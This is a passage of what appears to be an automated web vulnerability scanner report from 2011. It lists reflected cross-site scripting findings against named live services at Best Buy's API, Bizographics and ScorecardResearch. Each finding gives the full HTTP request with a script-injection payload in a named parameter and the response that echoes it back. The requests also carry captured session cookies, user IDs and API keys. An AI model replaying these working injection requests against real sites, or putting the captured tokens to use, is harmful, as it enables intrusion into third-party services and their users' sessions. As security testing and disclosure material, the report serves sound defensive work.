User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olstemplatemapper.jsp?id=pcat17410&type=page&carrier_text=Verizon+Wireless&list=y&sc=mobilePlansSP&usc=pcmcat203600050025&documentType=popup&contract_Id=926&contract_text=New+2-yr.+contract&sku_id=2330093&lcn=Mobile+-+Mobile+Package&carrier_Id=929&add_to_pkg=true&removeLinkFacet=&contract_selected=New+2-yr.+contract&plan_type=I
Cookie: TLTSID=84D0DE5AB13D10B1A8788827D0E141DC; mobileab=b; newgroup3=b; newgroup2=b; newgroup=a; group2=a; group=c; DYN_USER_CONFIRM=1304deff50b793ec00235e3b0413fa91; DYN_USER_ID=ATG12562361841; JSESSIONID=389450CC5B435E7E6961192C7DB2C725.bbolsp-app05-28; TLTUID=84D0DE5AB13D10B1A8788827D0E141DC; fsr.a=1310993962201

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web1.ATL
Etag: "9741fe2131014677912d443f74a248fe"
X-Runtime: 2
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2390
Date: Mon, 18 Jul 2011 13:00:19 GMT

SDSTATIC({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<YourApiKey> : 8880044, a
...[SNIP]...
<YourApiKey> : All stores within 10 miles of the latitude 38.89 and longitude -77.03"
],
"code": 400,
"message": "Couldn't understand '/v168799<script>alert(1)</script>a288158a184/products(digitalSku>
...[SNIP]...

3.4. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e9d2b<script>alert(1)</script>67b415acb5b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(digitalSku%3E%22%22e9d2b<script>alert(1)</script>67b415acb5b&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olstemplatemapper.jsp?id=pcat17410&type=page&carrier_text=Verizon+Wireless&list=y&sc=mobilePlansSP&usc=pcmcat203600050025&documentType=popup&contract_Id=926&contract_text=New+2-yr.+contract&sku_id=2330093&lcn=Mobile+-+Mobile+Package&carrier_Id=929&add_to_pkg=true&removeLinkFacet=&contract_selected=New+2-yr.+contract&plan_type=I
Cookie: TLTSID=84D0DE5AB13D10B1A8788827D0E141DC; mobileab=b; newgroup3=b; newgroup2=b; newgroup=a; group2=a; group=c; DYN_USER_CONFIRM=1304deff50b793ec00235e3b0413fa91; DYN_USER_ID=ATG12562361841; JSESSIONID=389450CC5B435E7E6961192C7DB2C725.bbolsp-app05-28; TLTUID=84D0DE5AB13D10B1A8788827D0E141DC; fsr.a=1310993962201

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web2.ATL
Etag: "4c75cf3cf3252688f340f0f4ea802c35"
X-Runtime: 2
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2390
Date: Mon, 18 Jul 2011 13:00:21 GMT

SDSTATIC({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<YourApiKey> : 8880044, a
...[SNIP]...
<YourApiKey> : All stores within 10 miles of the latitude 38.89 and longitude -77.03"
],
"code": 400,
"message": "Couldn't understand '/v1/products(digitalSku>\"\"e9d2b<script>alert(1)</script>67b415acb5b&sku in(9867653,9867644,9867608,9867592,9867574,9867486))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json'",
"status": "400 Bad Request"
}

...[SNIP]...

3.5. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 15b9d<script>alert(1)</script>ccb5f2f0c81 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC15b9d<script>alert(1)</script>ccb5f2f0c81&pageSize=99&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olstemplatemapper.jsp?id=pcat17410&type=page&carrier_text=Verizon+Wireless&list=y&sc=mobilePlansSP&usc=pcmcat203600050025&documentType=popup&contract_Id=926&contract_text=New+2-yr.+contract&sku_id=2330093&lcn=Mobile+-+Mobile+Package&carrier_Id=929&add_to_pkg=true&removeLinkFacet=&contract_selected=New+2-yr.+contract&plan_type=I
Cookie: TLTSID=84D0DE5AB13D10B1A8788827D0E141DC; mobileab=b; newgroup3=b; newgroup2=b; newgroup=a; group2=a; group=c; DYN_USER_CONFIRM=1304deff50b793ec00235e3b0413fa91; DYN_USER_ID=ATG12562361841; JSESSIONID=389450CC5B435E7E6961192C7DB2C725.bbolsp-app05-28; TLTUID=84D0DE5AB13D10B1A8788827D0E141DC; fsr.a=1310993962201

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web1.ATL
Etag: "226ca56fdabe2e825c5d252ee6a45428"
X-Runtime: 27
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 405
Date: Mon, 18 Jul 2011 13:00:10 GMT

SDSTATIC15b9d<script>alert(1)</script>ccb5f2f0c81({
"queryTime": "0.006",
"currentPage": 1,
"totalPages": 0,
"partial": false,
"from": 1,
"total": 0,
"to": 0,
"products": [

],
"canonicalUrl": "/v1/products(digitalSku>
...[SNIP]...

3.6. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d7646<script>alert(1)</script>868fac7865c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json&d7646<script>alert(1)</script>868fac7865c=1 HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olstemplatemapper.jsp?id=pcat17410&type=page&carrier_text=Verizon+Wireless&list=y&sc=mobilePlansSP&usc=pcmcat203600050025&documentType=popup&contract_Id=926&contract_text=New+2-yr.+contract&sku_id=2330093&lcn=Mobile+-+Mobile+Package&carrier_Id=929&add_to_pkg=true&removeLinkFacet=&contract_selected=New+2-yr.+contract&plan_type=I
Cookie: TLTSID=84D0DE5AB13D10B1A8788827D0E141DC; mobileab=b; newgroup3=b; newgroup2=b; newgroup=a; group2=a; group=c; DYN_USER_CONFIRM=1304deff50b793ec00235e3b0413fa91; DYN_USER_ID=ATG12562361841; JSESSIONID=389450CC5B435E7E6961192C7DB2C725.bbolsp-app05-28; TLTUID=84D0DE5AB13D10B1A8788827D0E141DC; fsr.a=1310993962201

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web1.ATL
Etag: "6a55e83eb495dc72dbe3a94b0f38a975"
X-Runtime: 3
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2393
Date: Mon, 18 Jul 2011 13:00:16 GMT

SDSTATIC({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<YourApiKey> : 8880044, a
...[SNIP]...
nderstand '/v1/products(digitalSku>\"\"&sku in(9867653,9867644,9867608,9867592,9867574,9867486))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json&d7646<script>alert(1)</script>868fac7865c=1'",
"status": "400 Bad Request"
}
})

3.7. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [pageSize parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))

Issue detail

The value of the pageSize request parameter is copied into the HTML document as plain text between tags. The payload d6c6e<script>alert(1)</script>eeac2f6fc7c was submitted in the pageSize parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99d6c6e<script>alert(1)</script>eeac2f6fc7c&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olstemplatemapper.jsp?id=pcat17410&type=page&carrier_text=Verizon+Wireless&list=y&sc=mobilePlansSP&usc=pcmcat203600050025&documentType=popup&contract_Id=926&contract_text=New+2-yr.+contract&sku_id=2330093&lcn=Mobile+-+Mobile+Package&carrier_Id=929&add_to_pkg=true&removeLinkFacet=&contract_selected=New+2-yr.+contract&plan_type=I
Cookie: TLTSID=84D0DE5AB13D10B1A8788827D0E141DC; mobileab=b; newgroup3=b; newgroup2=b; newgroup=a; group2=a; group=c; DYN_USER_CONFIRM=1304deff50b793ec00235e3b0413fa91; DYN_USER_ID=ATG12562361841; JSESSIONID=389450CC5B435E7E6961192C7DB2C725.bbolsp-app05-28; TLTUID=84D0DE5AB13D10B1A8788827D0E141DC; fsr.a=1310993962201

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web2.ATL
Etag: "a8b3c56b89f2fc21f325c2ff8d8b0f10"
X-Runtime: 3
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2390
Date: Mon, 18 Jul 2011 13:00:12 GMT

SDSTATIC({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<YourApiKey> : 8880044, a
...[SNIP]...
: "Couldn't understand '/v1/products(digitalSku>\"\"&sku in(9867653,9867644,9867608,9867592,9867574,9867486))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99d6c6e<script>alert(1)</script>eeac2f6fc7c&format=json'",
"status": "400 Bad Request"
}
})

3.8. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [show parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))

Issue detail

The value of the show request parameter is copied into the HTML document as plain text between tags. The payload 1a141<script>alert(1)</script>c2cb467df93 was submitted in the show parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))?dsku=true&show=sku,digitalSku1a141<script>alert(1)</script>c2cb467df93&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olstemplatemapper.jsp?id=pcat17410&type=page&carrier_text=Verizon+Wireless&list=y&sc=mobilePlansSP&usc=pcmcat203600050025&documentType=popup&contract_Id=926&contract_text=New+2-yr.+contract&sku_id=2330093&lcn=Mobile+-+Mobile+Package&carrier_Id=929&add_to_pkg=true&removeLinkFacet=&contract_selected=New+2-yr.+contract&plan_type=I
Cookie: TLTSID=84D0DE5AB13D10B1A8788827D0E141DC; mobileab=b; newgroup3=b; newgroup2=b; newgroup=a; group2=a; group=c; DYN_USER_CONFIRM=1304deff50b793ec00235e3b0413fa91; DYN_USER_ID=ATG12562361841; JSESSIONID=389450CC5B435E7E6961192C7DB2C725.bbolsp-app05-28; TLTUID=84D0DE5AB13D10B1A8788827D0E141DC; fsr.a=1310993962201

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web1.ATL
Etag: "ee7d295a422b247c30a90d8b7ae9e988"
X-Runtime: 3
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2390
Date: Mon, 18 Jul 2011 13:00:07 GMT

SDSTATIC({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<YourApiKey> : 8880044, a
...[SNIP]...
89 and longitude -77.03"
],
"code": 400,
"message": "Couldn't understand '/v1/products(digitalSku>\"\"&sku in(9867653,9867644,9867608,9867592,9867574,9867486))?dsku=true&show=sku,digitalSku1a141<script>alert(1)</script>c2cb467df93&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json'",
"status": "400 Bad Request"
}
})

3.9. http://api.bizographics.com/v1/profile.redirect [api_key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 11cb4<script>alert(1)</script>ed63ed5aa3e was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=798c7ba2e6b04aec86d660f36f6341a511cb4<script>alert(1)</script>ed63ed5aa3e&callback_url=http://rt.legolas-media.com/lgrt?ci=1%26ei=21%26ti=95%26vi=11%26sti=253%26sei=21%26sci=1%26sai=0%26smi=0%26pbi=0%26sts=1311016306513388%26sui=e01db2f2-208a-43e5-beec-a78df4693afe HTTP/1.1
Host: api.bizographics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redmondpie.com/jailbreak-4.3.4-ios-iphone-ipad-ipod-touch-using-pwnagetool-bundle-how-to-tutorial/
Cookie: BizoID=5be7e821-bd7b-4aa8-a2f3-d2cf3d37da97; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KUzMoRYIoxo1aj5XcunNcMDa7Re6IGD4lGZEeNQ8mRkAAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRwjRSjipLT3XS88yEBf0YisuEVUJBxdqAyBFVoPj6MdhlvP6Q090K7EBPXImH5HzDNYipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie; BizoNetworkPartnerIndex=11

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 18 Jul 2011 19:17:05 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 92
Connection: keep-alive

Unknown API key: (798c7ba2e6b04aec86d660f36f6341a511cb4<script>alert(1)</script>ed63ed5aa3e)

3.10. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the callback_url request parameter is copied into the HTML document as plain text between tags. The payload 9418c<script>alert(1)</script>c4c121c8b4e was submitted in the callback_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=798c7ba2e6b04aec86d660f36f6341a5&callback_url=9418c<script>alert(1)</script>c4c121c8b4e HTTP/1.1
Host: api.bizographics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redmondpie.com/jailbreak-4.3.4-ios-iphone-ipad-ipod-touch-using-pwnagetool-bundle-how-to-tutorial/
Cookie: BizoID=5be7e821-bd7b-4aa8-a2f3-d2cf3d37da97; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KUzMoRYIoxo1aj5XcunNcMDa7Re6IGD4lGZEeNQ8mRkAAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRwjRSjipLT3XS88yEBf0YisuEVUJBxdqAyBFVoPj6MdhlvP6Q090K7EBPXImH5HzDNYipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie; BizoNetworkPartnerIndex=11

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 18 Jul 2011 19:17:16 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 58
Connection: keep-alive

Unknown Referer: 9418c<script>alert(1)</script>c4c121c8b4e

3.11. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload fa22f<script>alert(1)</script>6e58205a0cf was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8fa22f<script>alert(1)</script>6e58205a0cf&c2=6036211&c3=&c4=&c5=&c6=&c10= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redmondpie.com/jailbreak-4.3.4-ios-iphone-ipad-ipod-touch-using-pwnagetool-bundle-how-to-tutorial/
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 25 Jul 2011 19:11:40 GMT
Date: Mon, 18 Jul 2011 19:11:40 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8fa22f<script>alert(1)</script>6e58205a0cf", c2:"6036211", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.12. http://b.scorecardresearch.com/beacon.js [c10 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 657a5<script>alert(1)</script>d4b430af5db was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6036211&c3=&c4=&c5=&c6=&c10=657a5<script>alert(1)</script>d4b430af5db HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redmondpie.com/jailbreak-4.3.4-ios-iphone-ipad-ipod-touch-using-pwnagetool-bundle-how-to-tutorial/
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 25 Jul 2011 19:11:43 GMT
Date: Mon, 18 Jul 2011 19:11:43 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
e;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6036211", c3:"", c4:"", c5:"", c6:"", c10:"657a5<script>alert(1)</script>d4b430af5db", c15:"", c16:"", r:""});



3.13. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload b83e4<script>alert(1)</script>9c3bbb2c538 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6036211b83e4<script>alert(1)</script>9c3bbb2c538&c3=&c4=&c5=&c6=&c10= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redmondpie.com/jailbreak-4.3.4-ios-iphone-ipad-ipod-touch-using-pwnagetool-bundle-how-to-tutorial/
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 25 Jul 2011 19:11:41 GMT
Date: Mon, 18 Jul 2011 19:11:41 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6036211b83e4<script>alert(1)</script>9c3bbb2c538", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.14. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 2ee04<script>alert(1)</script>178a92e0c0a was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6036211&c3=2ee04<script>alert(1)</script>178a92e0c0a&c4=&c5=&c6=&c10= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redmondpie.com/jailbreak-4.3.4-ios-iphone-ipad-ipod-touch-using-pwnagetool-bundle-how-to-tutorial/
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
